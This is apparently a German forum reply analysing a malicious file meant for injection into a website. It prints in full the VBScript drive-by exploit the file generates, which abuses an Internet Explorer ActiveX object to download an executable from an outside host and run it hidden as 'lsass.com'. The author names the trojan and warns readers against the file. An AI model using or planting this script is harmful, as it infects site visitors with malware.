Hi,

Schau dir einfach mal die Textdatei an und lies dir durch, was passieren würde (besonders die letzten Zeilen sind spannend). Vermutlich hättest du nachher nur noch Werbung auf deiner Seite :)

Iwo - jeder Besucher, der diese seiten dann mit dem IE und aktiviertem Javascript aufriefe, könnte sich den Trojaner "Win32.Rbot.dvd" (meldet Kaspersky - Sasser?) einfangen.

Das VBScript im iframe generiert dann nämlich folgendes Script:

<script language="VBScript">  
on error resume next  
  
dl = "http://usuarios.arnet.com.ar/alvarezluque/flash7.exe"  
Set df = document.createElement("object")  
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"  
Set x = df.CreateObject("Microsoft.XMLHTTP","")  
set S = df.createobject("Adodb.Stream","")  
S.type = 1  
str6="GET"  
x.Open str6, dl, False  
x.Send  
' Get temp directory and create our destination name  
fname1="lsass.com"  
set F = df.createobject("Scripting.FileSystemObject","")  
set tmp = F.GetSpecialFolder(2) ' Get tmp folder  
fname1= F.BuildPath(tmp,fname1)  
S.open  
S.write x.responseBody  
S.savetofile fname1,2  
S.close  
set Q = df.createobject("Shell.Application","")  
Q.ShellExecute fname1,"","","open",0  
</script>

(Einfach und ungefährlich herauszubekommen, indem man um document.write s noch eine textarea schreiben läßt.)

Die flash7.exe sollte niemand ohne aktuellen Virenschutz auch in anderen browsern aufrufen!

freundliche Grüße
Ingo